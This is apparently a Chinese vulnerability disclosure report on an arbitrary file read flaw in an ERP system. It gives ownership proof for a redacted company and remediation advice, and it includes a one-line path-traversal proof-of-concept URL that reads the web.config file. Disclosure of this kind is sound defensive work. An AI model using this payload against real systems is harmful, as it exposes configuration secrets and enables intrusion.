漏洞说明:
ERP 管理软件系统任意文件读取高危漏洞,该漏洞是由于对用户查看或下载的文件不做限制,可能导致读取配置信息甚至系统重要文件。严重的话,就可能导致SSRF,进而漫游至内网。
漏洞复现:
1.资产归属证明
1.通过页面授权单位为:xxx有限公司,联系人:xxx,在爱企查中查找到该单位,确认归属单位为xxx有限公司,如同所示:
2.利用poc
/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../web.config
可以查看web.config配置文件。证明漏洞存在,如下图所示:
3.修复建议
- 限制并进行过滤/../../字符。
- 禁止外界访问该页面。